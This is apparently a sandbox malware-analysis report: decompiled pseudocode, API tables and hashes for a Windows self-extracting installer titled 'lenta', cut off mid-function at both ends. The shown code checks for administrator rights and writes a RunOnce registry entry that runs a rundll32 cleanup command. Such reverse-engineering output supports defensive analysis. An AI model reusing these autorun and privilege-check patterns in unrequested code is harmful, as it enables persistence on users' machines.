                                                                      								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                      								_t80 = _t44;
                                                                      								if(_t80 == 0) {
                                                                      									goto L6;
                                                                      								} else {
                                                                      									E00F8171E(_t80, _t83,  &_v576, _t67);
                                                                      									goto L23;
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							_t77 = _t67;
                                                                      							_t18 = _t77 + 1; // 0x1
                                                                      							_t81 = _t18;
                                                                      							do {
                                                                      								_t58 =  *_t77;
                                                                      								_t77 = _t77 + 1;
                                                                      							} while (_t58 != 0);
                                                                      							_t75 = _t77 - _t81;
                                                                      							_t82 = _t84 + 1;
                                                                      							do {
                                                                      								_t59 =  *_t84;
                                                                      								_t84 = _t84 + 1;
                                                                      							} while (_t59 != 0);
                                                                      							_t21 = _t74 + 0x64; // 0x65
                                                                      							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                      							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                      							_t80 = _t44;
                                                                      							if(_t80 == 0) {
                                                                      								goto L6;
                                                                      							} else {
                                                                      								_push(_v580);
                                                                      								E00F8171E(_t80, _t83,  &_v576, _t67);
                                                                      								L23:
                                                                      								MessageBeep(_a12);
                                                                      								if(E00F8681F(_t67) == 0) {
                                                                      									L25:
                                                                      									_t49 = 0x10000;
                                                                      								} else {
                                                                      									_t54 = E00F867C9(_t74, _t74);
                                                                      									_t49 = 0x190000;
                                                                      									if(_t54 == 0) {
                                                                      										goto L25;
                                                                      									}
                                                                      								}
                                                                      								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
                                                                      								_t83 = _t52;
                                                                      								LocalFree(_t80);
                                                                      								_t39 = _t52;
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						if(E00F8681F(_t67) == 0) {
                                                                      							L4:
                                                                      							_t64 = 0x10010;
                                                                      						} else {
                                                                      							_t66 = E00F867C9(0, 0);
                                                                      							_t64 = 0x190010;
                                                                      							if(_t66 == 0) {
                                                                      								goto L4;
                                                                      							}
                                                                      						}
                                                                      						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                      						L6:
                                                                      						_t39 = _t44 | 0xffffffff;
                                                                      					}
                                                                      				}
                                                                      				return E00F86CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                      			}



































                                                                      0x00f844b9
                                                                      0x00f844c4
                                                                      0x00f844cb
                                                                      0x00f844d8
                                                                      0x00f844e4
                                                                      0x00f844eb
                                                                      0x00f844ee
                                                                      0x00f844ef
                                                                      0x00f844ef
                                                                      0x00f844f1
                                                                      0x00f844f7
                                                                      0x00f844f8
                                                                      0x00f8467b
                                                                      0x00f844fe
                                                                      0x00f84509
                                                                      0x00f84518
                                                                      0x00f84525
                                                                      0x00f84562
                                                                      0x00f84568
                                                                      0x00f84568
                                                                      0x00f8456b
                                                                      0x00f8456b
                                                                      0x00f8456d
                                                                      0x00f8456e
                                                                      0x00f84572
                                                                      0x00f84578
                                                                      0x00f8457c
                                                                      0x00f845cb
                                                                      0x00f84607
                                                                      0x00f84607
                                                                      0x00f8460d
                                                                      0x00f84613
                                                                      0x00f84617
                                                                      0x00000000
                                                                      0x00f8461d
                                                                      0x00f84623
                                                                      0x00f84626
                                                                      0x00f84628
                                                                      0x00000000
                                                                      0x00f84628
                                                                      0x00f845cd
                                                                      0x00f845cd
                                                                      0x00f845cf
                                                                      0x00f845cf
                                                                      0x00f845d2
                                                                      0x00f845d2
                                                                      0x00f845d4
                                                                      0x00f845d5
                                                                      0x00f845db
                                                                      0x00f845de
                                                                      0x00f845e3
                                                                      0x00f845e9
                                                                      0x00f845ed
                                                                      0x00000000
                                                                      0x00f845f3
                                                                      0x00f845fd
                                                                      0x00000000
                                                                      0x00f84602
                                                                      0x00f845ed
                                                                      0x00f8457e
                                                                      0x00f8457e
                                                                      0x00f84580
                                                                      0x00f84580
                                                                      0x00f84583
                                                                      0x00f84583
                                                                      0x00f84585
                                                                      0x00f84586
                                                                      0x00f8458a
                                                                      0x00f8458c
                                                                      0x00f8458f
                                                                      0x00f8458f
                                                                      0x00f84591
                                                                      0x00f84592
                                                                      0x00f8459b
                                                                      0x00f8459e
                                                                      0x00f845a3
                                                                      0x00f845a9
                                                                      0x00f845ad
                                                                      0x00000000
                                                                      0x00f845af
                                                                      0x00f845af
                                                                      0x00f845bf
                                                                      0x00f8462d
                                                                      0x00f84630
                                                                      0x00f8463d
                                                                      0x00f8464e
                                                                      0x00f8464e
                                                                      0x00f8463f
                                                                      0x00f84640
                                                                      0x00f84647
                                                                      0x00f8464c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8464c
                                                                      0x00f84666
                                                                      0x00f8466d
                                                                      0x00f8466f
                                                                      0x00f84675
                                                                      0x00f84675
                                                                      0x00f845ad
                                                                      0x00f84527
                                                                      0x00f8452e
                                                                      0x00f8453f
                                                                      0x00f8453f
                                                                      0x00f84530
                                                                      0x00f84531
                                                                      0x00f84538
                                                                      0x00f8453d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8453d
                                                                      0x00f84554
                                                                      0x00f8455a
                                                                      0x00f8455a
                                                                      0x00f8455a
                                                                      0x00f84525
                                                                      0x00f8468c

                                                                      APIs
                                                                      • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                      • MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F84554
                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 00F845A3
                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 00F845E3
                                                                      • LocalAlloc.KERNEL32(00000040,00000002), ref: 00F8460D
                                                                      • MessageBeep.USER32(00000000), ref: 00F84630
                                                                      • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00F84666
                                                                      • LocalFree.KERNEL32(00000000), ref: 00F8466F
                                                                        • Part of subcall function 00F8681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00F8686E
                                                                        • Part of subcall function 00F8681F: GetSystemMetrics.USER32(0000004A), ref: 00F868A7
                                                                        • Part of subcall function 00F8681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00F868CC
                                                                        • Part of subcall function 00F8681F: RegQueryValueExA.ADVAPI32(?,00F81140,00000000,?,?,0000000C), ref: 00F868F4
                                                                        • Part of subcall function 00F8681F: RegCloseKey.ADVAPI32(?), ref: 00F86902
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                      • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                      • API String ID: 3244514340-1000497449
                                                                      • Opcode ID: 6ad797bd7f6d40c874bd8c71284e7d7ba99b3600f182d4c742b71b20641f3bbd
                                                                      • Instruction ID: 9940a1fe6dbcc3c7c6772c9ea612413275d77c66b0fe11ba803d35112cee2737
                                                                      • Opcode Fuzzy Hash: 6ad797bd7f6d40c874bd8c71284e7d7ba99b3600f182d4c742b71b20641f3bbd
                                                                      • Instruction Fuzzy Hash: ED51F67290021AABDB21BF28CC48BFABB69EF45310F144195FD19A7241DB75ED05EB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E00F82773(CHAR* __ecx, char* _a4) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				char _v269;
                                                                      				CHAR* _v276;
                                                                      				int _v280;
                                                                      				void* _v284;
                                                                      				int _v288;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t23;
                                                                      				intOrPtr _t34;
                                                                      				int _t45;
                                                                      				int* _t50;
                                                                      				CHAR* _t52;
                                                                      				CHAR* _t61;
                                                                      				char* _t62;
                                                                      				int _t63;
                                                                      				CHAR* _t64;
                                                                      				signed int _t65;
                                                                      
                                                                      				_t52 = __ecx;
                                                                      				_t23 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t23 ^ _t65;
                                                                      				_t62 = _a4;
                                                                      				_t50 = 0;
                                                                      				_t61 = __ecx;
                                                                      				_v276 = _t62;
                                                                      				 *((char*)(__ecx)) = 0;
                                                                      				if( *_t62 != 0x23) {
                                                                      					_t63 = 0x104;
                                                                      					goto L14;
                                                                      				} else {
                                                                      					_t64 = _t62 + 1;
                                                                      					_v269 = CharUpperA( *_t64);
                                                                      					_v276 = CharNextA(CharNextA(_t64));
                                                                      					_t63 = 0x104;
                                                                      					_t34 = _v269;
                                                                      					if(_t34 == 0x53) {
                                                                      						L14:
                                                                      						GetSystemDirectoryA(_t61, _t63);
                                                                      						goto L15;
                                                                      					} else {
                                                                      						if(_t34 == 0x57) {
                                                                      							GetWindowsDirectoryA(_t61, 0x104);
                                                                      							goto L16;
                                                                      						} else {
                                                                      							_push(_t52);
                                                                      							_v288 = 0x104;
                                                                      							E00F81781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                      							_t59 = 0x104;
                                                                      							E00F8658A( &_v268, 0x104, _v276);
                                                                      							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                      								L16:
                                                                      								_t59 = _t63;
                                                                      								E00F8658A(_t61, _t63, _v276);
                                                                      							} else {
                                                                      								if(RegQueryValueExA(_v284, 0xf81140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                      									_t45 = _v280;
                                                                      									if(_t45 != 2) {
                                                                      										L9:
                                                                      										if(_t45 == 1) {
                                                                      											goto L10;
                                                                      										}
                                                                      									} else {
                                                                      										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                      											_t45 = _v280;
                                                                      											goto L9;
                                                                      										} else {
                                                                      											_t59 = 0x104;
                                                                      											E00F81680(_t61, 0x104,  &_v268);
                                                                      											L10:
                                                                      											_t50 = 1;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								RegCloseKey(_v284);
                                                                      								L15:
                                                                      								if(_t50 == 0) {
                                                                      									goto L16;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return E00F86CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                      			}























                                                                      0x00f82773
                                                                      0x00f8277e
                                                                      0x00f82785
                                                                      0x00f8278a
                                                                      0x00f8278d
                                                                      0x00f82790
                                                                      0x00f82792
                                                                      0x00f82798
                                                                      0x00f8279d
                                                                      0x00f828b2
                                                                      0x00000000
                                                                      0x00f827a3
                                                                      0x00f827a3
                                                                      0x00f827af
                                                                      0x00f827c2
                                                                      0x00f827c8
                                                                      0x00f827cd
                                                                      0x00f827d5
                                                                      0x00f828b7
                                                                      0x00f828b9
                                                                      0x00000000
                                                                      0x00f827db
                                                                      0x00f827dd
                                                                      0x00f828aa
                                                                      0x00000000
                                                                      0x00f827e3
                                                                      0x00f827e3
                                                                      0x00f827ec
                                                                      0x00f827f8
                                                                      0x00f82803
                                                                      0x00f8280b
                                                                      0x00f82831
                                                                      0x00f828c3
                                                                      0x00f828c9
                                                                      0x00f828cd
                                                                      0x00f82837
                                                                      0x00f8285a
                                                                      0x00f8285c
                                                                      0x00f82865
                                                                      0x00f82892
                                                                      0x00f82895
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f82867
                                                                      0x00f82878
                                                                      0x00f8288c
                                                                      0x00000000
                                                                      0x00f8287a
                                                                      0x00f82880
                                                                      0x00f82885
                                                                      0x00f82897
                                                                      0x00f82899
                                                                      0x00f82899
                                                                      0x00f82878
                                                                      0x00f82865
                                                                      0x00f828a0
                                                                      0x00f828bf
                                                                      0x00f828c1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f828c1
                                                                      0x00f82831
                                                                      0x00f827dd
                                                                      0x00f827d5
                                                                      0x00f828e5

                                                                      APIs
                                                                      • CharUpperA.USER32(644C7055,00000000,00000000,00000000), ref: 00F827A8
                                                                      • CharNextA.USER32(0000054D), ref: 00F827B5
                                                                      • CharNextA.USER32(00000000), ref: 00F827BC
                                                                      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82829
                                                                      • RegQueryValueExA.ADVAPI32(?,00F81140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82852
                                                                      • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82870
                                                                      • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F828A0
                                                                      • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00F828AA
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00F828B9
                                                                      Strings
                                                                      • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00F827E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                      • API String ID: 2659952014-2428544900
                                                                      • Opcode ID: af52a5f68144c05ae8cb9eca2e5313ec7edcc7ee12002e194ddcf87f74c8484e
                                                                      • Instruction ID: d7b0e3628f32fb5107f536d484f53446f5a43f7ea33ba94c891ab12707549c1b
                                                                      • Opcode Fuzzy Hash: af52a5f68144c05ae8cb9eca2e5313ec7edcc7ee12002e194ddcf87f74c8484e
                                                                      • Instruction Fuzzy Hash: 5F41A571E0012CAFEF64AB649C45AFE77BDEB15710F0440AAF545D2100DB749E86AFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 62%
                                                                      			E00F82267() {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				char _v836;
                                                                      				void* _v840;
                                                                      				int _v844;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t19;
                                                                      				intOrPtr _t33;
                                                                      				void* _t38;
                                                                      				intOrPtr* _t42;
                                                                      				void* _t45;
                                                                      				void* _t47;
                                                                      				void* _t49;
                                                                      				signed int _t51;
                                                                      
                                                                      				_t19 =  *0xf88004; // 0x644c7055
                                                                      				_t20 = _t19 ^ _t51;
                                                                      				_v8 = _t19 ^ _t51;
                                                                      				if( *0xf88530 != 0) {
                                                                      					_push(_t49);
                                                                      					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                      						_push(_t38);
                                                                      						_v844 = 0x238;
                                                                      						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                      							_push(_t47);
                                                                      							memset( &_v268, 0, 0x104);
                                                                      							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                      								E00F8658A( &_v268, 0x104, 0xf81140);
                                                                      							}
                                                                      							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                      							E00F8171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                      							_t42 =  &_v836;
                                                                      							_t45 = _t42 + 1;
                                                                      							_pop(_t47);
                                                                      							do {
                                                                      								_t33 =  *_t42;
                                                                      								_t42 = _t42 + 1;
                                                                      							} while (_t33 != 0);
                                                                      							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                      						}
                                                                      						_t20 = RegCloseKey(_v840);
                                                                      						_pop(_t38);
                                                                      					}
                                                                      					_pop(_t49);
                                                                      				}
                                                                      				return E00F86CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                      			}



















                                                                      0x00f82272
                                                                      0x00f82277
                                                                      0x00f82279
                                                                      0x00f82283
                                                                      0x00f82289
                                                                      0x00f822ab
                                                                      0x00f822b1
                                                                      0x00f822c4
                                                                      0x00f822e0
                                                                      0x00f822e6
                                                                      0x00f822f5
                                                                      0x00f8230d
                                                                      0x00f8231c
                                                                      0x00f8231c
                                                                      0x00f82321
                                                                      0x00f8233a
                                                                      0x00f82342
                                                                      0x00f82348
                                                                      0x00f8234b
                                                                      0x00f8234c
                                                                      0x00f8234c
                                                                      0x00f8234e
                                                                      0x00f8234f
                                                                      0x00f8236e
                                                                      0x00f8236e
                                                                      0x00f8237a
                                                                      0x00f82380
                                                                      0x00f82380
                                                                      0x00f82381
                                                                      0x00f82381
                                                                      0x00f8238f

                                                                      APIs
                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00F822A3
                                                                      • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 00F822D8
                                                                      • memset.MSVCRT ref: 00F822F5
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00F82305
                                                                      • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00F8236E
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00F8237A
                                                                      Strings
                                                                      • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00F8232D
                                                                      • wextract_cleanup1, xrefs: 00F8227C, 00F822CD, 00F82363
                                                                      • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00F82299
                                                                      • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F82321
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                      • API String ID: 3027380567-2048191181
                                                                      • Opcode ID: 500901cec70fe4e95f1d2f1b69edfec912e172d96d2ac7c019fc4f6d56ec277c
                                                                      • Instruction ID: 31250253b458fc3ab86304a07b99c451c071ae6b1201425c2b033351fb44ab4e
                                                                      • Opcode Fuzzy Hash: 500901cec70fe4e95f1d2f1b69edfec912e172d96d2ac7c019fc4f6d56ec277c
                                                                      • Instruction Fuzzy Hash: 9331C571A0021C6BDB21AB50DC49FEA7B7CEB15750F4401AAB50DEA050EA75AB89EB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 87%
                                                                      			E00F83100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				void* _t8;
                                                                      				void* _t11;
                                                                      				void* _t15;
                                                                      				struct HWND__* _t16;
                                                                      				struct HWND__* _t33;
                                                                      				struct HWND__* _t34;
                                                                      
                                                                      				_t8 = _a8 - 0xf;
                                                                      				if(_t8 == 0) {
                                                                      					if( *0xf88590 == 0) {
                                                                      						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                      						 *0xf88590 = 1;
                                                                      					}
                                                                      					L13:
                                                                      					return 0;
                                                                      				}
                                                                      				_t11 = _t8 - 1;
                                                                      				if(_t11 == 0) {
                                                                      					L7:
                                                                      					_push(0);
                                                                      					L8:
                                                                      					EndDialog(_a4, ??);
                                                                      					L9:
                                                                      					return 1;
                                                                      				}
                                                                      				_t15 = _t11 - 0x100;
                                                                      				if(_t15 == 0) {
                                                                      					_t16 = GetDesktopWindow();
                                                                      					_t33 = _a4;
                                                                      					E00F843D0(_t33, _t16);
                                                                      					SetDlgItemTextA(_t33, 0x834,  *0xf88d4c);
                                                                      					SetWindowTextA(_t33, "lenta");
                                                                      					SetForegroundWindow(_t33);
                                                                      					_t34 = GetDlgItem(_t33, 0x834);
                                                                      					 *0xf888b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                      					SetWindowLongA(_t34, 0xfffffffc, E00F830C0);
                                                                      					return 1;
                                                                      				}
                                                                      				if(_t15 != 1) {
                                                                      					goto L13;
                                                                      				}
                                                                      				if(_a12 != 6) {
                                                                      					if(_a12 != 7) {
                                                                      						goto L9;
                                                                      					}
                                                                      					goto L7;
                                                                      				}
                                                                      				_push(1);
                                                                      				goto L8;
                                                                      			}









                                                                      0x00f83108
                                                                      0x00f8310b
                                                                      0x00f831b7
                                                                      0x00f831ca
                                                                      0x00f831d0
                                                                      0x00f831d0
                                                                      0x00f831da
                                                                      0x00000000
                                                                      0x00f831da
                                                                      0x00f83111
                                                                      0x00f83114
                                                                      0x00f83136
                                                                      0x00f83136
                                                                      0x00f83138
                                                                      0x00f8313b
                                                                      0x00f83141
                                                                      0x00000000
                                                                      0x00f83143
                                                                      0x00f83116
                                                                      0x00f8311b
                                                                      0x00f8314b
                                                                      0x00f83151
                                                                      0x00f83158
                                                                      0x00f8316a
                                                                      0x00f83176
                                                                      0x00f8317d
                                                                      0x00f8318b
                                                                      0x00f8319e
                                                                      0x00f831a3
                                                                      0x00000000
                                                                      0x00f831ad
                                                                      0x00f83120
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8312a
                                                                      0x00f83134
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83134
                                                                      0x00f8312c
                                                                      0x00000000

                                                                      APIs
                                                                      • EndDialog.USER32(?,00000000), ref: 00F8313B
                                                                      • GetDesktopWindow.USER32 ref: 00F8314B
                                                                      • SetDlgItemTextA.USER32(?,00000834), ref: 00F8316A
                                                                      • SetWindowTextA.USER32(?,lenta), ref: 00F83176
                                                                      • SetForegroundWindow.USER32(?), ref: 00F8317D
                                                                      • GetDlgItem.USER32(?,00000834), ref: 00F83185
                                                                      • GetWindowLongA.USER32(00000000,000000FC), ref: 00F83190
                                                                      • SetWindowLongA.USER32(00000000,000000FC,00F830C0), ref: 00F831A3
                                                                      • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00F831CA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                      • String ID: lenta
                                                                      • API String ID: 3785188418-2780258678
                                                                      • Opcode ID: a7072cb8c7411702f7fbdcc0732567a77d93f923634abdc61bc0a48d0245dfd1
                                                                      • Instruction ID: 9f80be09db7ffeee191898cd68db2de6920b69796e62a89e0ca2e1f9887b5527
                                                                      • Opcode Fuzzy Hash: a7072cb8c7411702f7fbdcc0732567a77d93f923634abdc61bc0a48d0245dfd1
                                                                      • Instruction Fuzzy Hash: C211B431A04619BBEB216F64AC0CBFA3A64FB46F70F100612F815D51F0DB749641FB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E00F818A3(void* __edx, void* __esi) {
                                                                      				signed int _v8;
                                                                      				short _v12;
                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                      				char _v20;
                                                                      				long _v24;
                                                                      				void* _v28;
                                                                      				void* _v32;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				signed int _t23;
                                                                      				long _t45;
                                                                      				void* _t49;
                                                                      				int _t50;
                                                                      				void* _t52;
                                                                      				signed int _t53;
                                                                      
                                                                      				_t51 = __esi;
                                                                      				_t49 = __edx;
                                                                      				_t23 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t23 ^ _t53;
                                                                      				_t25 =  *0xf88128; // 0x2
                                                                      				_t45 = 0;
                                                                      				_v12 = 0x500;
                                                                      				_t50 = 2;
                                                                      				_v16.Value = 0;
                                                                      				_v20 = 0;
                                                                      				if(_t25 != _t50) {
                                                                      					L20:
                                                                      					return E00F86CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                      				}
                                                                      				if(E00F817EE( &_v20) != 0) {
                                                                      					_t25 = _v20;
                                                                      					if(_v20 != 0) {
                                                                      						 *0xf88128 = 1;
                                                                      					}
                                                                      					goto L20;
                                                                      				}
                                                                      				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                      					goto L20;
                                                                      				}
                                                                      				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                      					L17:
                                                                      					CloseHandle(_v28);
                                                                      					_t25 = _v20;
                                                                      					goto L20;
                                                                      				} else {
                                                                      					_push(__esi);
                                                                      					_t52 = LocalAlloc(0, _v24);
                                                                      					if(_t52 == 0) {
                                                                      						L16:
                                                                      						_pop(_t51);
                                                                      						goto L17;
                                                                      					}
                                                                      					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                      						L15:
                                                                      						LocalFree(_t52);
                                                                      						goto L16;
                                                                      					} else {
                                                                      						if( *_t52 <= 0) {
                                                                      							L14:
                                                                      							FreeSid(_v32);
                                                                      							goto L15;
                                                                      						}
                                                                      						_t15 = _t52 + 4; // 0x4
                                                                      						_t50 = _t15;
                                                                      						while(EqualSid( *_t50, _v32) == 0) {
                                                                      							_t45 = _t45 + 1;
                                                                      							_t50 = _t50 + 8;
                                                                      							if(_t45 <  *_t52) {
                                                                      								continue;
                                                                      							}
                                                                      							goto L14;
                                                                      						}
                                                                      						 *0xf88128 = 1;
                                                                      						_v20 = 1;
                                                                      						goto L14;
                                                                      					}
                                                                      				}
                                                                      			}


















                                                                      0x00f818a3
                                                                      0x00f818a3
                                                                      0x00f818ab
                                                                      0x00f818b2
                                                                      0x00f818b5
                                                                      0x00f818be
                                                                      0x00f818c0
                                                                      0x00f818c6
                                                                      0x00f818c7
                                                                      0x00f818ca
                                                                      0x00f818cf
                                                                      0x00f819c9
                                                                      0x00f819d8
                                                                      0x00f819d8
                                                                      0x00f818df
                                                                      0x00f819b8
                                                                      0x00f819bd
                                                                      0x00f819bf
                                                                      0x00f819bf
                                                                      0x00000000
                                                                      0x00f819bd
                                                                      0x00f818fa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f81912
                                                                      0x00f819aa
                                                                      0x00f819ad
                                                                      0x00f819b3
                                                                      0x00000000
                                                                      0x00f81927
                                                                      0x00f81927
                                                                      0x00f81932
                                                                      0x00f81936
                                                                      0x00f819a9
                                                                      0x00f819a9
                                                                      0x00000000
                                                                      0x00f819a9
                                                                      0x00f8194c
                                                                      0x00f819a2
                                                                      0x00f819a3
                                                                      0x00000000
                                                                      0x00f8196e
                                                                      0x00f81970
                                                                      0x00f81999
                                                                      0x00f8199c
                                                                      0x00000000
                                                                      0x00f8199c
                                                                      0x00f81972
                                                                      0x00f81972
                                                                      0x00f81975
                                                                      0x00f81984
                                                                      0x00f81985
                                                                      0x00f8198a
